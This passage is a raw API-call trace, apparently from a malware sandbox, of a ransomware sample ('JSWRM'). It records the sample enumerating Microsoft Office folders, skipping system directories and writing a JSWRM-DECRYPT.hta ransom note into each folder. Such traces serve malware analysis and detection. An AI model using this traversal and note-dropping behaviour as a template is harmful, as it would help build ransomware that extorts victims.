(lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.326] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.326] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.326] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.326] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.326] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63c7502, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63c7502, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf63c7502, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8c040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0123.326] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.326] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="ro", cAlternateFileName="")) returned 1 [0123.326] lstrcmpiW (lpString1="ro", lpString2=".") returned 1 [0123.326] lstrcmpiW (lpString1="ro", lpString2="..") returned 1 [0123.326] lstrcmpiW (lpString1="ro", lpString2="...") returned 1 [0123.326] lstrcmpiW (lpString1="ro", lpString2="windows") returned -1 [0123.326] lstrcmpiW (lpString1="ro", lpString2="recovery") returned 1 [0123.326] lstrcmpiW (lpString1="ro", lpString2="perflogs") returned 1 [0123.326] lstrcmpiW (lpString1="ro", lpString2="documents and settings") returned 1 [0123.326] lstrcmpiW (lpString1="ro", lpString2="$RECYCLE.BIN") returned 1 [0123.326] lstrcmpiW (lpString1="ro", lpString2="system volume information") returned -1 [0123.326] lstrcmpiW (lpString1="ro", lpString2="msocache") returned 1 [0123.327] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ro\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ro\\jswrm-decrypt.hta")) returned 0xffffffff [0123.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ro\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ro\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.361] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.361] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.362] CloseHandle (hObject=0x338) returned 1 [0123.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ro\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ro\\jswrm-decrypt.hta")) returned 0x20 [0123.362] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ro\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40318050, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231cc0 [0123.362] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.362] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40318050, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.362] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.362] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.362] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40318050, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40318050, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40318050, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.362] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.362] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.362] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.363] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.363] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.363] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.363] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.363] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.363] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.363] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.363] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80fc2c4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80fc2c4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80fc2c4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.363] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5fc257f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5fc257f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x605aed7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.363] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d298, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.364] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.364] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.365] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0063153, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8daa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.365] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.365] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.365] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.365] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.365] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.365] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.365] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.365] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.365] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.365] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.365] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0063153, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8daa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0123.365] FindClose (in: hFindFile=0x231cc0 | out: hFindFile=0x231cc0) returned 1 [0123.365] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="ru", cAlternateFileName="")) returned 1 [0123.365] lstrcmpiW (lpString1="ru", lpString2=".") returned 1 [0123.365] lstrcmpiW (lpString1="ru", lpString2="..") returned 1 [0123.365] lstrcmpiW (lpString1="ru", lpString2="...") returned 1 [0123.365] lstrcmpiW (lpString1="ru", lpString2="windows") returned -1 [0123.365] lstrcmpiW (lpString1="ru", lpString2="recovery") returned 1 [0123.365] lstrcmpiW (lpString1="ru", lpString2="perflogs") returned 1 [0123.365] lstrcmpiW (lpString1="ru", lpString2="documents and settings") returned 1 [0123.365] lstrcmpiW (lpString1="ru", lpString2="$RECYCLE.BIN") returned 1 [0123.365] lstrcmpiW (lpString1="ru", lpString2="system volume information") returned -1 [0123.365] lstrcmpiW (lpString1="ru", lpString2="msocache") returned 1 [0123.366] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ru\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ru\\jswrm-decrypt.hta")) returned 0xffffffff [0123.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ru\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ru\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.367] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.367] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.368] CloseHandle (hObject=0x338) returned 1 [0123.368] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ru\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ru\\jswrm-decrypt.hta")) returned 0x20 [0123.368] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ru\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40318050, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0123.369] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.369] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40318050, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, 